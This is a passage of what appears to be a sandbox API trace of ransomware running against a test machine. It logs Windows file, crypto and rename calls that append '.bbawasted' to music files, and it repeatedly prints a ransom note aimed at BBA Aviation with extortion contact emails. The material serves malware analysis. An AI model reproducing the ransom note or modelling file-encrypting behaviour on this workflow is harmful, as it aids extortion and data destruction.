3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\a e5l-4dd_.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0221.277] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0221.278] SetEndOfFile (hFile=0x290) returned 1 [0221.279] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0221.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.279] lstrcpyW (in: lpString1=0x6c4cb0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0221.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\a e5L-4Dd_.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\a e5l-4dd_.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\a e5L-4Dd_.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\a e5l-4dd_.wav.bbawasted")) returned 1 [0221.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\a e5L-4Dd_.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\a e5l-4dd_.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0221.281] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0221.281] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x2294 [0221.281] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2294) returned 0x5f0000 [0221.281] CloseHandle (hObject=0x27c) returned 1 [0221.282] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0221.283] CloseHandle (hObject=0x280) returned 1 [0221.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0221.283] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6708) returned 1 [0221.284] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0221.284] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0221.284] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6680) returned 1 [0221.285] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0221.285] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0221.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0221.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.297] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ipC/OR35CmP2xwHLPII4A+9pgbvzVJgqwmCKgEZkvvvHD5HsKvZrqecvbTnPC6cS\r\nJlZAQGk0H9NlU9ORIK5oRz0oIenhK5S7DFQaD3BCa9WBZCf/va43WGHJhUHaS6ep\r\nIUWWKf8iaaFMJP9bf/zECmzJ2cE6wr56iInZHs0qo11ixwgPKrJ8/KuDuUyoakZO\r\n3vkQiXGseWUyx3u4pnEmRbJhAdmRIHiM0s6KeBtDmhwd5YgiiyRxXNE1pkM+YqVC\r\ncQI+bWNiyWmsVuy2TGUQX032cIkGSS8aJi7WF73GknqJbgCFunguaNqHeDWYm0IF\r\nIov18dydjofhbvhG7RFlEyj/tWoQU5zRLjptY3xFcwAD75ymjGfoFBfCxaM33xi3\r\nt2jm7X12+dVk3Pa7HJhjhKXr0QDmIdczDRJWn4RFhQfZBeWYIJTPQASmJ+y6akXE\r\nWOeflhWtw1j+4vzhmddjRZ9vCplPasxx277qhOpVbwoIVecaDZ7ts8MjQjeq0Nvy\r\nJ/IUyKhtjBJdYOv2c/1THg+rLlheaNgfQj72U7J+hFwRHQeMOpedNjuSH2rGHEcl\r\nOLJDEo3VIw1ds4TVQYDj7pxm3tEshctONjm5YbiCgPWPNK2MSTildrbXzB8aCCFJ\r\nTfZXDha59z35zWeHxCiU2MqYivXsb4D/Fz/xGTOyrLS=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.298] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.298] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0221.298] SetEndOfFile (hFile=0x290) returned 1 [0221.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.301] CloseHandle (hObject=0x290) returned 1 [0221.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0221.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c03a8 | out: hHeap=0x660000) returned 1 [0221.302] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0221.303] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0221.303] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0221.303] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\esaeJigk5cxLo9traVxw.mp3") returned 158 [0221.303] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x346) returned 0x6c4b88 [0221.303] lstrcpyW (in: lpString1=0x6c4cc4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0221.303] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.303] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0221.304] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0221.304] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0221.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\esaeJigk5cxLo9traVxw.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\esaejigk5cxlo9travxw.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0221.305] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0221.306] SetEndOfFile (hFile=0x290) returned 1 [0221.306] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0221.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.307] lstrcpyW (in: lpString1=0x6c4cc4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0221.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\esaeJigk5cxLo9traVxw.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\esaejigk5cxlo9travxw.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\esaeJigk5cxLo9traVxw.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\esaejigk5cxlo9travxw.mp3.bbawasted")) returned 1 [0221.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\esaeJigk5cxLo9traVxw.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\esaejigk5cxlo9travxw.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0221.308] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0221.308] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x7027 [0221.309] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7027) returned 0x5f0000 [0221.309] CloseHandle (hObject=0x280) returned 1 [0221.310] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0221.578] CloseHandle (hObject=0x27c) returned 1 [0221.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0221.578] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6350) returned 1 [0221.579] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0221.579] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0221.579] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6460) returned 1 [0221.579] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0221.579] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0221.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0221.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.588] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]TYobsyOb096u98VwYKdKUGDGriXIYVJoYCFbSs4sVEiNNGOSa0h/9qMzORtxtNFB\r\njmvsodtB0ZyeDX3CPtxqK/qg0d1ygIFw4daHBktxvVPwCPufR98DHbF+by+1Zbyn\r\nqP4Ji+cIhYSi9kLvnbIRFVqi3WImVu07xkSIlnroW78QF/0Ft/NG/NEiAq3Gdq53\r\n3LXgMbCZGe1IUntDlu0OHIQltCeGnxpejOOt9LMdaEhe/u7mUZRQRipdGNNw5Nqn\r\nNORfKw2e9412WBW2RQNmFSvgPDiI8B99AdssCjdA4T8tgP24lP+pp6PX1F/seAbm\r\nT5MPNUFnLY5x1YgVmlG4WGLtrYr9wPvPcKimP5k0qRRZ1iItOkps37U6hvyor2Qi\r\n4CmN40RkVVw+5pivbjKvRX+CN9j7TgJXy6mMP3UJZUBpPKO3v27y1aRPKO/YXw2v\r\nkZ9o6lfrwJOBJxSVGfp9pMRRvZ8AMUQBPrtKxwkn4B2vOipyb54t3Zu8H0PKdwNh\r\nLhfX9HhevtUDpMQg5fpEULAyhICiwpDT705oBuUrv82TAWPju5gxCeDhVD20Vosv\r\nFSYY+sR6YMrVgRI63+I0PqHLVZESSTpXWirSM/2i0hFlYnSA02IGXJp2ZP9/MR0E\r\n9QCYYrqBISi0HH/qUTXHh83zOSgbdiRoQPteCBMd6Js=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.588] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0221.589] SetEndOfFile (hFile=0x290) returned 1 [0221.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.591] CloseHandle (hObject=0x290) returned 1 [0221.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0221.592] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0530 | out: hHeap=0x660000) returned 1 [0221.592] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0221.593] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0221.593] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0221.593] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\QXWlpyG569dBS.m4a") returned 151 [0221.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x338) returned 0x6c4b88 [0221.593] lstrcpyW (in: lpString1=0x6c4cb6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0221.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.593] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5e88) returned 1 [0221.594] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0221.594] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0221.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\QXWlpyG569dBS.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\qxwlpyg569dbs.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0221.595] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0221.596] SetEndOfFile (hFile=0x290) returned 1 [0221.596] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0221.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.597] lstrcpyW (in: lpString1=0x6c4cb6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0221.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\QXWlpyG569dBS.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\qxwlpyg569dbs.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\QXWlpyG569dBS.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\qxwlpyg569dbs.m4a.bbawasted")) returned 1 [0221.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\QXWlpyG569dBS.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\qxwlpyg569dbs.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0221.598] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0221.598] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x96c0 [0221.598] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x96c0) returned 0x5f0000 [0221.599] CloseHandle (hObject=0x27c) returned 1 [0221.601] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0221.601] CloseHandle (hObject=0x288) returned 1 [0221.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0221.601] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6bd0) returned 1 [0221.602] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0221.602] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0221.602] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0221.603] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0221.603] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0221.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0221.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.864] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]h7PngwmJeI1y8fIAX4LqR1IkHmKKcN/dyf4ZlfpuoIQM/adGU9cyUNVa8gNyJTMl\r\n8M2ANIvfDEsJkcwIfzLjDP3TjvHYvItqKABsW2AQnVMC0f9eQIj5qmFhN6BTI5j3\r\n+IhB0C6Llzmt+49jRrLy4g7lX2zEC7gn5yf62tkDnVwR1I2LIsplsPo3hF6n8/by\r\n5Hl1s1flbWhSsz5zff0UwWBdx8sS1Bo4jb0hgYv6XkXAjI1RuFW1MqMEjITgF6mG\r\npendpVNAt2MVTB8dDb7ZacGvmTM/C73jyWPiSET17GgBrjOqtxRBXeYH9KLcsjOz\r\nVS6LT8q7WL87Mo+BrCyzfrYmE16J0jxlB3AUHZ5Y2brWP92t10AXCephaWnSoRnq\r\nZip2Mo4kBEJDxGH4bM30HEk9tAVuGLiE2PHVpFZrQ50fZ+HBQ4aK9jlSV9veNkU3\r\navd6ugF9eFkRom8oJJ60yVOITb91SGcZR0Qpx575P7mV2pm2U3qez9uJTupa7H06\r\nXCO0/BRW8nfFn0tFAfkqGljW5i4RP6s8wB+iK1LkAzbe/QygzRQG2hO7gBhng3hB\r\nj05+wTFjFKOKoYsRRDPASBJfHGz+1+h1BFKK5FwZ0W6vC6YrRNoSq7IMCky01U+X\r\nEyEUrLN+Jg/8pIeRCICq2XwsTNbEcRsrkVY2R994ASl=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.865] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0221.865] SetEndOfFile (hFile=0x290) returned 1 [0221.868] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | 